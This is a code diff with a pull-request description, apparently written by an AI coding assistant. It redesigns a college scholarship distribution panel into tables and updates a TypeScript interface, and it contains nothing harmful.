+          ...group.admitted.map((s) => ({ ...s, status: "admitted" as const, order: s.rank_position })),
+          ...group.backup.map((s) => ({ ...s, status: "backup" as const, order: s.backup_position })),
+          ...group.rejected.map((s) => ({ ...s, status: "rejected" as const })),
+        ];
+        return (
+          <div key={group.code} className="overflow-hidden rounded-lg border border-gray-200 bg-white">
+            <div className="flex flex-wrap items-center justify-between gap-2 border-b border-gray-200 bg-gray-50/80 px-4 py-3">
+              <h3 className="text-base font-semibold text-gray-800">{group.label}</h3>
+              <div className="flex items-center gap-4">
+                <StatusCount status="admitted" count={group.admitted.length} />
+                <StatusCount status="backup" count={group.backup.length} />
+                <StatusCount status="rejected" count={group.rejected.length} />
+              </div>
+            </div>
+            {rows.length === 0 ? (
+              <p className="px-4 py-8 text-center text-sm text-gray-400">此類別暫無分發名單</p>
+            ) : (
+              <Table>
+                <TableHeader>
+                  <TableRow className="hover:bg-transparent">
+                    <TableHead className="h-10 w-20 text-center">順位</TableHead>
+                    <TableHead className="h-10 w-24">狀態</TableHead>
+                    <TableHead className="h-10">姓名</TableHead>
+                    <TableHead className="h-10">學號</TableHead>
+                    <TableHead className="h-10">系所</TableHead>
+                  </TableRow>
+                </TableHeader>
+                <TableBody>
+                  {rows.map((row) => (
+                    <TableRow
+                      key={`${row.status}-${row.student_number}`}
+                      className={row.status === "rejected" ? "text-gray-400" : "text-gray-700"}
+                    >
+                      <TableCell className="py-2.5 text-center tabular-nums">
+                        {typeof row.order === "number" ? row.order : "—"}
+                      </TableCell>
+                      <TableCell className="py-2.5">
+                        <Badge variant="outline" className={STATUS_CONFIG[row.status].badgeClass}>
+                          {STATUS_CONFIG[row.status].label}
+                        </Badge>
+                      </TableCell>
+                      <TableCell className="py-2.5 font-medium">{row.student_name}</TableCell>
+                      <TableCell className="py-2.5 tabular-nums">{row.student_number}</TableCell>
+                      <TableCell className="py-2.5">{row.department || "—"}</TableCell>
+                    </TableRow>
+                  ))}
+                </TableBody>
+              </Table>
+            )}
+          </div>
+        );
+      })}
     </div>
   );
 }
 
-function Section({
-  title,
-  tone,
-  children,
-}: {
-  title: string;
-  tone: "emerald" | "amber" | "gray";
-  children: React.ReactNode;
-}) {
-  const hasItems = Array.isArray(children) ? children.length > 0 : !!children;
-  const toneClass =
-    tone === "emerald" ? "text-emerald-700" : tone === "amber" ? "text-amber-700" : "text-gray-500";
+function StatusCount({ status, count }: { status: DistributionStatus; count: number }) {
+  const config = STATUS_CONFIG[status];
   return (
-    <div className="mb-3 last:mb-0">
-      <p className={`mb-1 text-xs font-semibold ${toneClass}`}>{title}</p>
-      {hasItems ? <ul className="space-y-0.5">{children}</ul> : <p className="text-xs text-gray-400">—</p>}
-    </div>
-  );
-}
-
-function Row({
-  order,
-  name,
-  id,
-  department,
-}: {
-  order?: number;
-  name: string;
-  id: string;
-  department: string;
-}) {
-  return (
-    <li className="flex items-center gap-2 text-sm text-gray-700">
-      {typeof order === "number" && <span className="tabular-nums text-gray-400">{order}.</span>}
-      <span>{name}</span>
-      <span className="text-xs text-gray-400">({id})</span>
-      {department && <span className="text-xs text-gray-500">{department}</span>}
-    </li>
+    <span className="flex items-center gap-1.5 text-xs text-gray-600">
+      <span className={`h-2 w-2 rounded-full ${config.dotClass}`} aria-hidden />
+      {config.label}
+      <span className="font-semibold tabular-nums text-gray-800">{count}</span>
+    </span>
   );
 }

--- a/frontend/lib/api/modules/college.ts
+++ b/frontend/lib/api/modules/college.ts
@@ -56,8 +56,7 @@ export interface DistributionStudent {
   department: string;
   /** Sub-type labels the student applied for (what they were allocated may differ). */
   applied_sub_types?: string[];
-  rank_position?: number;
-  backup_position?: number;
+  rank_position?: number | null;
 }
 
 export interface DistributionSubTypeGroup {

--- a/frontend/lib/api/modules/college.ts
+++ b/frontend/lib/api/modules/college.ts
@@ -54,6 +54,8 @@ export interface DistributionStudent {
   student_number: string;
   student_name: string;
   department: string;
+  /** Sub-type labels the student applied for (what they were allocated may differ). */
+  applied_sub_types?: string[];
   rank_position?: number;
   backup_position?: number;
 }


### PR DESCRIPTION
## Summary

Redesigns the college-facing 分發結果 panel from plain nested lists into proper tables, and aligns the Excel/PDF export with the new presentation.

- **Panel**: one card per sub-type that admitted students (順位/姓名/學號/系所/申請獎學金), plus a single pooled **未錄取** card sorted by college rank — the meaningless literal `default` group (the ranking's sub-type code that rejected students were bucketed under) no longer surfaces, and 備取 rows fold into 未錄取 since nothing in the current distribution flow writes `backup_allocations`.
- **New 申請獎學金 column**: the loader now emits `applied_sub_types` per student (from `Application.scholarship_subtype_list`, resolved to display labels via the existing label map); shown in every table and in the export.
- **Export**: `flatten_sub_types` mirrors the panel — per-sub-type 正取 blocks first, then pooled 未錄取 with `—` as 類別 instead of `default`, sorted by rank. Excel and PDF share the same row model so both formats pick this up.
- **Review fixes** (from /code-review): backup rows now carry `rank_position` on every loader bucket; the panel's rank sort treats JSON `null` as unranked (sorts last, matching the export); React row keys are index-disambiguated against `N/A` student numbers; dead `backup_position` dropped from the TS interface.

## Test plan

- [x] `test_college_view_distribution.py` (13), `test_college_distribution_export_service.py` (15), `test_college_distribution_export_endpoint.py` (8) all pass
- [x] black / flake8 (B904, B014) clean; `tsc --noEmit` clean
- [x] Verified live as `cs_college` (114/全年, 博士生獎學金): screenshots of the panel through each iteration, plus a real xlsx download inspected row-by-row (no `default` 類別, panel-matching order, 申請獎學金 populated) and PDF returns 200

🤖 Generated with [Claude Code](https://claude.com/claude-code)